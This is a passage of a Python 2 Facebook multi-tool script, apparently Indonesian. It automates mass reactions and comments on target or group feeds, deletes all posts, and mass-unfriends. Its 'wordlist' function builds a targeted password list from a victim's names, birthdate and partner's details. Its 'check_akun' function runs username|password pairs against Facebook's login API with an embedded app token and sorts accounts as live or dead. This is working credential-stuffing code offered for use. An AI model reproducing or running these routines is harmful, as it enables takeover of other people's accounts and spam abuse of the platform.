react\_pilih()

else:

if aksi == '1':

tipe = 'LIKE'

react()

else:

if aksi == '2':

tipe = 'LOVE'

react()

else:

if aksi == '3':

tipe = 'WOW'

react()

else:

if aksi == '4':

tipe = 'HAHA'

react()

else:

if aksi == '5':

tipe = 'SAD'

react()

else:

if aksi == '6':

tipe = 'ANGRY'

react()

else:

if aksi == '0':

menu\_bot()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'

react\_pilih()

def react():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

ide = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')

limit = raw\_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')

try:

oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access\_token=' + toket)

ah = json.loads(oh.text)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for a in ah['feed']['data']:

y = a['id']

reaksi.append(y)

requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access\_token=' + toket)

print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe

print

print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

except KeyError:

print '\x1b[1;91m[!] ID not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def grup\_react():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'

print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'

print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'

print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'

print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'

print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

reactg\_pilih()

def reactg\_pilih():

global tipe

aksi = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if aksi == '':

print '\x1b[1;91m[!] Can\'t empty'

reactg\_pilih()

else:

if aksi == '1':

tipe = 'LIKE'

reactg()

else:

if aksi == '2':

tipe = 'LOVE'

reactg()

else:

if aksi == '3':

tipe = 'WOW'

reactg()

else:

if aksi == '4':

tipe = 'HAHA'

reactg()

else:

if aksi == '5':

tipe = 'SAD'

reactg()

else:

if aksi == '6':

tipe = 'ANGRY'

reactg()

else:

if aksi == '0':

menu\_bot()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'

reactg\_pilih()

def reactg():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

ide = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')

limit = raw\_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')

ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access\_token=' + toket)

asw = json.loads(ah.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']

try:

oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access\_token=' + toket)

ah = json.loads(oh.text)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for a in ah['feed']['data']:

y = a['id']

reaksigrup.append(y)

requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access\_token=' + toket)

print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe

print

print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

except KeyError:

print '\x1b[1;91m[!] ID not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def bot\_komen():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"

ide = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')

km = raw\_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')

limit = raw\_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')

km = km.replace('<>', '\n')

try:

p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access\_token=' + toket)

a = json.loads(p.text)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for s in a['feed']['data']:

f = s['id']

komen.append(f)

requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access\_token=' + toket)

print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'

print

print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

except KeyError:

print '\x1b[1;91m[!] ID not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def grup\_komen():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"

ide = raw\_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')

km = raw\_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')

limit = raw\_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')

km = km.replace('<>', '\n')

try:

ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access\_token=' + toket)

asw = json.loads(ah.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']

p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access\_token=' + toket)

a = json.loads(p.text)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for s in a['feed']['data']:

f = s['id']

komengrup.append(f)

requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access\_token=' + toket)

print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'

print

print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

except KeyError:

print '\x1b[1;91m[!] ID not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def deletepost():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

nam = requests.get('https://graph.facebook.com/me?access\_token=' + toket)

lol = json.loads(nam.text)

nama = lol['name']

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama

jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

asu = requests.get('https://graph.facebook.com/me/feed?access\_token=' + toket)

asus = json.loads(asu.text)

for p in asus['data']:

id = p['id']

piro = 0

url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access\_token=' + toket)

ok = json.loads(url.text)

try:

error = ok['error']['message']

print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'

except TypeError:

print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'

piro += 1

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[!] Connection Error'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

print '\n\x1b[1;91m[+] \x1b[1;97mFinish'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def accept():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

limit = raw\_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')

r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access\_token=' + toket)

friends = json.loads(r.text)

if '[]' in str(friends['data']):

print '\x1b[1;91m[!] No friends request'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for i in friends['data']:

gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access\_token=' + toket)

a = json.loads(gas.text)

if 'error' in str(a):

print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']

print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

else:

print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']

print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\n\x1b[1;91m[+] \x1b[1;97mFinish'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def unfriend():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;97mStop \x1b[1;91mCTRL+C'

print

try:

pek = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

cok = json.loads(pek.text)

for i in cok['data']:

nama = i['name']

id = i['id']

requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access\_token=' + toket)

print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id

except IndexError:

pass

except KeyboardInterrupt:

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

print '\n\x1b[1;91m[+] \x1b[1;97mFinish'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_bot()

def lain():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Write Status'

print '║-> \x1b[1;37;40m2. Make Wordlist'

print '║-> \x1b[1;37;40m3. Account Checker'

print '║-> \x1b[1;37;40m4. List Group'

print '║-> \x1b[1;37;40m5. Profile Guard'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

pilih\_lain()

def pilih\_lain():

other = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if other == '':

print '\x1b[1;91m[!] Can\'t empty'

pilih\_lain()

else:

if other == '1':

status()

else:

if other == '2':

wordlist()

else:

if other == '3':

check\_akun()

else:

if other == '4':

grupsaya()

else:

if other == '5':

guard()

else:

if other == '0':

menu()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'

pilih\_lain()

def status():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

msg = raw\_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')

if msg == '':

print '\x1b[1;91m[!] Can\'t empty'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

else:

res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access\_token=' + toket)

op = json.loads(res.text)

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

def wordlist():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

a = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')

file = open(a + '.txt', 'w')

b = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')

c = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')

d = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')

e = raw\_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')

f = e[0:2]

g = e[2:4]

h = e[4:]

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'

i = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')

j = raw\_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')

k = raw\_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

l = k[0:2]

m = k[2:4]

n = k[4:]

file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))

wg = 0

while wg < 100:

wg = wg + 1

file.write(a + str(wg) + '\n')

en = 0

while en < 100:

en = en + 1

file.write(i + str(en) + '\n')

word = 0

while word < 100:

word = word + 1

file.write(d + str(word) + '\n')

gen = 0

while gen < 100:

gen = gen + 1

file.write(j + str(gen) + '\n')

file.close()

time.sleep(1.5)

print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

except IOError as e:

print '\x1b[1;91m[!] Make file failed'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

def check\_akun():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

live = []

cek = []

die = []

try:

file = raw\_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')

list = open(file, 'r').readlines()

except IOError:

print '\x1b[1;91m[!] File not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

pemisah = raw\_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for meki in list:

username, password = meki.strip().split(str(pemisah))

url = 'https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + username + '&locale=en\_US&password=' + password + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'

data = requests.get(url)

mpsh = json.loads(data.text)

if 'access\_token' in mpsh:

live.append(password)

print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password

elif 'www.facebook.com' in mpsh['error\_msg']:

cek.append(password)

print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password

else:

die.append(password)

print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password

print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

def grupsaya():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

try:

uh = requests.get('https://graph.facebook.com/me/groups?access\_token=' + toket)

gud = json.loads(uh.text)

for p in gud['data']:

nama = p['name']

id = p['id']

f = open('grupid.txt', 'w')

listgrup.append(id)

f.write(id + '\n')

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)

print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)

print 52 \* '\x1b[1;97m='

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)

print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'

f.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

except KeyError:

os.remove('grupid.txt')

print '\x1b[1;91m[!] Group not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

def guard():

global toket

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Enable'

print '║-> \x1b[1;37;40m2. Disable'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

g = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if g == '1':

aktif = 'true'

gaz(toket, aktif)

else:

if g == '2':

non = 'false'

gaz(toket, non)

else:

if g == '0':

lain()

else:

if g == '':

keluar()

else:

keluar()

def get\_userid(toket):

url = 'https://graph.facebook.com/me?access\_token=%s' % toket

res = requests.get(url)

uid = json.loads(res.text)

return uid['id']

def gaz(toket, enable=True):

id = get\_userid(toket)

data = 'variables={"0":{"is\_shielded": %s,"session\_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor\_id":"%s","client\_mutation\_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc\_id=1477043292367183&query\_name=IsShieldedSetMutation&strip\_defaults=true&strip\_nulls=true&locale=en\_US&client\_country\_code=US&fb\_api\_req\_friendly\_name=IsShieldedSetMutation&fb\_api\_caller\_class=IsShieldedSetMutation' % (enable, str(id))

headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}

url = 'https://graph.facebook.com/graphql'

res = requests.post(url, data=data, headers=headers)

print res.text

if '"is\_shielded":true' in res.text:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

else:

if '"is\_shielded":false' in res.text:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

lain()

else:

print '\x1b[1;91m[!] Error'

keluar()

if \_\_name\_\_ == '\_\_main\_\_':

login()